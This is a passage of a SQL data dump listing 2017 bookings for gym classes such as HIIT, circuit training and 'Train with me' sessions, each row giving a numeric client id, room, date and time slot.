(9430, 273, 'CTR', '2017-04-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9431, 273, 'CTR', '2017-04-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9432, 272, 'CTR', '2017-04-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9433, 272, 'CTR', '2017-04-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9434, 275, 'CTR', '2017-04-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9435, 275, 'CTR', '2017-04-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9436, 218, 'CTR', '2017-04-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9437, 218, 'CTR', '2017-04-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9438, 80, 'CTR', '2017-04-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9439, 80, 'CTR', '2017-04-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9440, 180, 'CTR', '2017-04-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9441, 180, 'CTR', '2017-04-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9442, 266, 'CTR', '2017-03-28', '19h30', '20h15', 'Groupe Privé'),
(9443, 266, 'CTR', '2017-03-28', '19h30', '20h15', 'Groupe Privé'),
(9444, 48, 'CTR', '2017-03-29', '18h15', '18h45', 'Circuit Training'),
(9445, 31, 'CTR', '2017-03-29', '18h15', '18h45', 'Circuit Training'),
(9446, 195, 'CTR', '2017-03-29', '18h15', '18h45', 'Circuit Training'),
(9447, 278, 'CTR', '2017-03-29', '18h15', '18h45', 'Circuit Training'),
(9448, 231, 'CTR', '2017-03-29', '18h15', '18h45', 'Circuit Training'),
(9449, 48, 'CTR', '2017-03-29', '19h ', '19h30', 'Circuit training'),
(9450, 31, 'CTR', '2017-03-29', '19h ', '19h30', 'Circuit training'),
(9451, 247, 'CTR', '2017-03-29', '20h30', '21h00', 'Circuit Training'),
(9452, 247, 'CTR', '2017-03-29', '20h30', '21h00', 'Circuit Training'),
(9453, 173, 'CTR', '2017-03-29', '20h30', '21h00', 'Circuit Training'),
(9454, 188, 'CTR', '2017-03-29', '20h30', '21h00', 'Circuit Training'),
(9455, 48, 'CTR', '2017-03-31', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9456, 31, 'CTR', '2017-03-31', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9457, 230, 'CTR', '2017-03-30', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9458, 191, 'CTR', '2017-03-30', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9459, 189, 'CTR', '2017-04-01', '10h00', '11h00', 'Oubli inscription'),
(9460, 265, 'CTR', '2017-04-01', '10h00', '11h00', 'Oubli inscription'),
(9461, 195, 'CTR', '2017-04-01', '10h00', '11h00', 'Oubli inscription'),
(9462, 47, 'CTR', '2017-04-01', '10h00', '11h00', 'Oubli inscription'),
(9463, 193, 'CTR', '2017-04-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9464, 193, 'CTR', '2017-04-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9465, 193, 'CTR', '2017-04-05', '18h15', '18h45', 'Circuit Training'),
(9466, 210, 'CTR', '2017-04-05', '18h15', '18h45', 'Circuit Training'),
(9467, 193, 'CTR', '2017-04-05', '19h ', '19h30', 'Circuit training'),
(9468, 31, 'CTR', '2017-04-05', '18h15', '18h45', 'Circuit Training'),
(9469, 31, 'CTR', '2017-04-05', '19h ', '19h30', 'Circuit training'),
(9470, 48, 'CTR', '2017-04-07', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9471, 31, 'CTR', '2017-04-07', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9473, 264, 'CTR', '2017-04-08', '10h00', '11h00', 'Oubli encodage Train With Me'),
(9474, 195, 'CTR', '2017-04-08', '10h00', '11h00', 'Oubli encodage Train With Me'),
(9475, 132, 'CTR', '2017-04-17', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9476, 132, 'CTR', '2017-04-17', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9477, 279, 'CTR', '2017-04-13', '12h45', '13h15', 'Circuit Training'),
(9478, 210, 'CTR', '2017-04-12', '18h15', '18h45', 'Circuit Training'),
(9479, 48, 'CTR', '2017-04-12', '18h15', '18h45', 'Circuit Training'),
(9480, 48, 'CTR', '2017-04-12', '19h ', '19h30', 'Circuit training'),
(9481, 31, 'CTR', '2017-04-12', '18h15', '18h45', 'Circuit Training'),
(9482, 31, 'CTR', '2017-04-12', '19h ', '19h30', 'Circuit training'),
(9483, 269, 'CTR', '2017-04-21', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9484, 230, 'CTR', '2017-04-13', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9485, 193, 'CTR', '2017-04-14', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9487, 231, 'CTR', '2017-04-17', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9488, 248, 'CTR', '2017-04-17', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9489, 264, 'CTR', '2017-04-17', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9490, 264, 'CTR', '2017-04-17', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9491, 265, 'CTR', '2017-04-17', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9492, 265, 'CTR', '2017-04-17', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9493, 265, 'CTR', '2017-04-17', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9494, 265, 'CTR', '2017-04-17', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9495, 205, 'CTR', '2017-04-17', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9496, 205, 'CTR', '2017-04-17', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9497, 230, 'CTR', '2017-04-17', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9498, 230, 'CTR', '2017-04-17', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9499, 193, 'CTR', '2017-04-17', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9500, 193, 'CTR', '2017-04-17', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9501, 180, 'CTR', '2017-04-17', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9502, 180, 'CTR', '2017-04-17', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9503, 80, 'CTR', '2017-04-17', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9504, 80, 'CTR', '2017-04-17', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9505, 279, 'CTR', '2017-04-20', '12h45', '13h15', 'Circuit Training'),
(9506, 255, 'CTR', '2017-04-24', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9507, 258, 'CTR', '2017-04-17', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9508, 258, 'CTR', '2017-04-17', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9509, 231, 'CTR', '2017-04-24', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9595, 80, 'CTR', '2017-04-24', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9511, 248, 'CTR', '2017-04-24', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9512, 80, 'CTR', '2017-04-24', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9513, 230, 'CTR', '2017-04-24', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9514, 230, 'CTR', '2017-04-24', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9515, 205, 'CTR', '2017-04-24', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9516, 205, 'CTR', '2017-04-24', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9517, 258, 'CTR', '2017-04-24', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9518, 258, 'CTR', '2017-04-24', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9519, 132, 'CTR', '2017-04-24', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9520, 132, 'CTR', '2017-04-24', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9521, 265, 'CTR', '2017-04-24', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9522, 265, 'CTR', '2017-04-24', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9523, 265, 'CTR', '2017-04-24', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9524, 265, 'CTR', '2017-04-24', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9525, 265, 'lim', '2017-04-17', '18h30', '19h30', 'Oubli vendredi Train with me'),
(9526, 264, 'lim', '2017-04-17', '18h30', '19h30', 'Oubli vendredi Train with me'),
(9527, 258, 'lim', '2017-04-17', '18h30', '19h30', 'Oubli vendredi Train with me'),
(9528, 48, 'CTR', '2017-04-19', '18h15', '18h45', 'Circuit Training'),
(9530, 48, 'CTR', '2017-04-24', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9531, 48, 'CTR', '2017-04-24', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9532, 132, 'CTR', '2017-04-21', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9533, 31, 'CTR', '2017-04-19', '18h15', '18h45', 'Circuit Training'),
(9534, 31, 'CTR', '2017-04-19', '19h ', '19h30', 'Circuit training'),
(9535, 274, 'CTR', '2017-04-24', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9536, 274, 'CTR', '2017-04-24', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9537, 231, 'CTR', '2017-04-19', '18h15', '18h45', 'Circuit Training'),
(9538, 278, 'CTR', '2017-04-19', '18h15', '18h45', 'Circuit Training'),
(9539, 231, 'CTR', '2017-04-19', '19h ', '19h30', 'Circuit training'),
(9585, 261, 'CTR', '2017-04-28', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9584, 265, 'CTR', '2017-04-28', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9542, 247, 'CTR', '2017-04-19', '20h30', '21h00', 'Circuit Training'),
(9543, 173, 'CTR', '2017-04-19', '20h30', '21h00', 'Circuit Training'),
(9592, 80, 'CTR', '2017-04-24', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9591, 80, 'CTR', '2017-04-24', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9547, 230, 'CTR', '2017-04-20', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9548, 205, 'CTR', '2017-04-20', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9549, 189, 'CTR', '2017-04-20', '12h45', '13h15', 'Circuit Training'),
(9550, 267, 'CTR', '2017-04-20', '12h45', '13h15', 'Circuit Training'),
(9551, 268, 'CTR', '2017-04-20', '12h45', '13h15', 'Circuit Training'),
(9552, 205, 'CTR', '2017-04-20', '12h45', '13h15', 'Circuit Training'),
(9553, 140, 'CTR', '2017-04-20', '12h45', '13h15', 'Circuit Training'),
(9554, 188, 'CTR', '2017-04-20', '12h45', '13h15', 'Circuit Training'),
(9632, 48, 'CTR', '2017-05-03', '18h15', '18h45', 'Circuit Training'),
(9598, 275, 'CTR', '2017-04-25', '19h00', '19h30', 'Duo Training'),
(9599, 275, 'CTR', '2017-04-25', '19h00', '19h30', 'Duo Training'),
(9600, 213, 'CTR', '2017-04-25', '19h00', '19h30', 'Duo Training'),
(9559, 48, 'CTR', '2017-04-21', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9560, 279, 'CTR', '2017-04-27', '12h45', '13h15', 'Circuit Training'),
(9561, 278, 'CTR', '2017-04-21', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9562, 195, 'CTR', '2017-04-21', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9563, 265, 'CTR', '2017-04-21', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9564, 264, 'CTR', '2017-04-21', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9565, 47, 'CTR', '2017-04-21', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9566, 180, 'CTR', '2017-04-21', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9567, 261, 'CTR', '2017-04-21', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9568, 80, 'CTR', '2017-04-24', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9569, 80, 'CTR', '2017-04-24', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9635, 247, 'CTR', '2017-05-03', '20h30', '21h00', 'Circuit Training'),
(9596, 80, 'CTR', '2017-04-24', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9572, 48, 'CTR', '2017-04-26', '18h15', '18h45', 'Circuit Training'),
(9573, 31, 'CTR', '2017-04-26', '18h15', '18h45', 'Circuit Training'),
(9574, 195, 'CTR', '2017-04-26', '18h15', '18h45', 'Circuit Training'),
(9575, 231, 'CTR', '2017-04-26', '18h15', '18h45', 'Circuit Training'),
(9576, 278, 'CTR', '2017-04-26', '18h15', '18h45', 'Circuit Training'),
(9626, 210, 'CTR', '2017-04-26', '18h15', '18h45', 'Circuit Training'),
(9625, 132, 'CTR', '2017-04-26', '20h30', '21h00', 'Circuit Training'),
(9636, 247, 'CTR', '2017-05-03', '20h30', '21h00', 'Circuit Training'),
(9580, 247, 'CTR', '2017-04-26', '20h30', '21h00', 'Circuit Training'),
(9581, 247, 'CTR', '2017-04-26', '20h30', '21h00', 'Circuit Training'),
(9582, 173, 'CTR', '2017-04-26', '20h30', '21h00', 'Circuit Training'),
(9627, 191, 'CTR', '2017-04-27', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9586, 269, 'CTR', '2017-04-28', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9587, 47, 'CTR', '2017-04-28', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9588, 195, 'CTR', '2017-04-28', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9589, 48, 'CTR', '2017-04-28', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9630, 132, 'CTR', '2017-05-05', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9593, 249, 'CTR', '2017-04-24', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9594, 249, 'CTR', '2017-04-24', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9631, 255, 'CTR', '2017-05-08', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9633, 195, 'CTR', '2017-05-03', '18h15', '18h45', 'Circuit Training'),
(9604, 80, 'CTR', '2017-05-01', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9605, 80, 'CTR', '2017-05-01', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9606, 132, 'CTR', '2017-05-01', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9607, 132, 'CTR', '2017-05-01', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9608, 258, 'CTR', '2017-05-01', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9609, 258, 'CTR', '2017-05-01', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9610, 230, 'CTR', '2017-05-01', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9611, 230, 'CTR', '2017-05-01', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9612, 205, 'CTR', '2017-05-01', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9613, 205, 'CTR', '2017-05-01', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9614, 180, 'CTR', '2017-05-01', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9615, 180, 'CTR', '2017-05-01', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9616, 80, 'CTR', '2017-05-01', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9617, 80, 'CTR', '2017-05-01', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9618, 265, 'CTR', '2017-05-01', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9619, 265, 'CTR', '2017-05-01', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9620, 218, 'CTR', '2017-05-01', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9621, 218, 'CTR', '2017-05-01', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9622, 275, 'CTR', '2017-05-01', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9623, 275, 'CTR', '2017-05-01', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9624, 189, 'CTR', '2017-04-27', '12h45', '13h15', 'Circuit Training'),
(9628, 230, 'CTR', '2017-04-27', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9634, 231, 'CTR', '2017-05-03', '18h15', '18h45', 'Circuit Training'),
(9637, 173, 'CTR', '2017-05-03', '20h30', '21h00', 'Circuit Training'),
(9638, 140, 'CTR', '2017-05-03', '18h15', '18h45', 'Circuit Training'),
(9639, 191, 'CTR', '2017-05-04', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9640, 257, 'CTR', '2017-05-08', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9641, 132, 'CTR', '2017-05-10', '19h ', '19h30', 'Circuit training'),
(9642, 48, 'CTR', '2017-05-08', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9643, 48, 'CTR', '2017-05-08', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9644, 255, 'CTR', '2017-05-22', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9645, 31, 'CTR', '2017-05-10', '18h15', '18h45', 'Circuit Training'),
(9687, 48, 'CTR', '2017-05-10', '18h15', '18h45', 'Circuit Training'),
(9665, 257, 'CTR', '2017-05-15', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9648, 263, 'CTR', '2017-05-08', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9649, 213, 'CTR', '2017-05-09', '19h00', '19h30', 'Duo Training'),
(9650, 265, 'CTR', '2017-05-08', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9651, 265, 'CTR', '2017-05-08', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9652, 265, 'CTR', '2017-05-08', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9653, 265, 'CTR', '2017-05-08', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9654, 264, 'CTR', '2017-05-08', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9655, 264, 'CTR', '2017-05-08', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9656, 80, 'CTR', '2017-05-08', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9657, 80, 'CTR', '2017-05-08', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9658, 281, 'CTR', '2017-05-08', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9659, 281, 'CTR', '2017-05-08', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9660, 231, 'CTR', '2017-05-08', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9661, 231, 'CTR', '2017-05-15', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9662, 263, 'CTR', '2017-05-08', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9666, 263, 'CTR', '2017-05-15', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9664, 255, 'CTR', '2017-05-15', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9667, 48, 'CTR', '2017-05-15', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9668, 48, 'CTR', '2017-05-15', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9669, 132, 'CTR', '2017-05-08', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9670, 132, 'CTR', '2017-05-08', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9671, 256, 'CTR', '2017-05-08', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9672, 256, 'CTR', '2017-05-08', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9673, 230, 'CTR', '2017-05-08', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9674, 230, 'CTR', '2017-05-08', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9675, 80, 'CTR', '2017-05-08', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9676, 80, 'CTR', '2017-05-08', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9677, 205, 'CTR', '2017-05-08', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9678, 205, 'CTR', '2017-05-08', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9679, 132, 'CTR', '2017-05-15', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9680, 132, 'CTR', '2017-05-15', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9703, 31, 'CTR', '2017-05-19', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9702, 230, 'CTR', '2017-05-18', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9683, 80, 'CTR', '2017-05-15', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9684, 80, 'CTR', '2017-05-15', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9685, 205, 'CTR', '2017-05-15', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9686, 205, 'CTR', '2017-05-15', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9688, 140, 'CTR', '2017-05-10', '18h15', '18h45', 'Circuit Training'),
(9689, 230, 'CTR', '2017-05-11', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9690, 191, 'CTR', '2017-05-11', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9691, 132, 'CTR', '2017-05-19', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9692, 205, 'CTR', '2017-05-11', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9693, 279, 'CTR', '2017-05-18', '12h45', '13h15', 'Circuit Training'),
(9694, 260, 'CTR', '2017-05-15', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9695, 280, 'CTR', '2017-05-15', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9696, 147, 'CTR', '2017-05-15', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9697, 260, 'CTR', '2017-05-15', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9698, 31, 'CTR', '2017-05-17', '18h15', '18h45', 'Circuit Training'),
(9699, 48, 'CTR', '2017-05-17', '18h15', '18h45', 'Circuit Training'),
(9700, 147, 'CTR', '2017-05-17', '18h15', '18h45', 'Circuit Training'),
(9731, 281, 'CTR', '2017-05-22', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9704, 48, 'CTR', '2017-05-19', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9705, 269, 'CTR', '2017-05-19', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9706, 177, 'CTR', '2017-05-19', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9707, 80, 'CTR', '2017-05-19', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9708, 80, 'CTR', '2017-05-19', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9730, 281, 'CTR', '2017-05-22', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9710, 205, 'CTR', '2017-05-19', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9711, 180, 'CTR', '2017-05-19', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9712, 261, 'CTR', '2017-05-19', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9713, 3, 'CTR', '2017-05-19', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9714, 231, 'CTR', '2017-05-22', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9761, 278, 'CTR', '2017-05-24', '18h15', '18h45', 'Circuit Training'),
(9716, 248, 'CTR', '2017-05-22', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9744, 132, 'CTR', '2017-05-26', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9718, 147, 'CTR', '2017-05-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9719, 147, 'CTR', '2017-05-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9720, 205, 'CTR', '2017-05-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9721, 205, 'CTR', '2017-05-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9722, 80, 'CTR', '2017-05-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9723, 80, 'CTR', '2017-05-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9724, 260, 'CTR', '2017-05-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9725, 260, 'CTR', '2017-05-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9726, 132, 'CTR', '2017-05-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9727, 132, 'CTR', '2017-05-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9728, 282, 'CTR', '2017-05-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9729, 282, 'CTR', '2017-05-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9732, 230, 'CTR', '2017-05-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9733, 230, 'CTR', '2017-05-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9734, 48, 'CTR', '2017-05-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9735, 48, 'CTR', '2017-05-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9736, 265, 'CTR', '2017-05-22', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9737, 265, 'CTR', '2017-05-22', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9738, 265, 'CTR', '2017-05-22', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)');
INSERT INTO `reservation_reservation_bck` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(9739, 265, 'CTR', '2017-05-22', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9740, 264, 'CTR', '2017-05-22', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9741, 264, 'CTR', '2017-05-22', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9742, 280, 'CTR', '2017-05-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9743, 138, 'CTR', '2017-05-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9745, 261, 'CTR', '2017-05-26', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9746, 284, 'CTR', '2017-05-26', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9747, 265, 'CTR', '2017-05-26', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9748, 3, 'CTR', '2017-05-26', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9749, 180, 'CTR', '2017-05-26', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9759, 48, 'CTR', '2017-05-24', '19h ', '19h30', 'Circuit training'),
(9760, 31, 'CTR', '2017-05-24', '19h ', '19h30', 'Circuit training'),
(9752, 231, 'CTR', '2017-05-24', '18h15', '18h45', 'Circuit Training'),
(9753, 132, 'CTR', '2017-05-24', '18h15', '18h45', 'Circuit Training'),
(9754, 195, 'CTR', '2017-05-24', '18h15', '18h45', 'Circuit Training'),
(9755, 177, 'CTR', '2017-05-24', '18h15', '18h45', 'Circuit Training'),
(9756, 283, 'CTR', '2017-05-24', '18h15', '18h45', 'Circuit Training'),
(9757, 247, 'CTR', '2017-05-24', '19h ', '19h30', 'Circuit training'),
(9762, 31, 'CTR', '2017-05-26', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9763, 48, 'CTR', '2017-05-26', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9764, 280, 'CTR', '2017-05-29', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9765, 280, 'CTR', '2017-05-29', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9766, 255, 'CTR', '2017-05-29', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
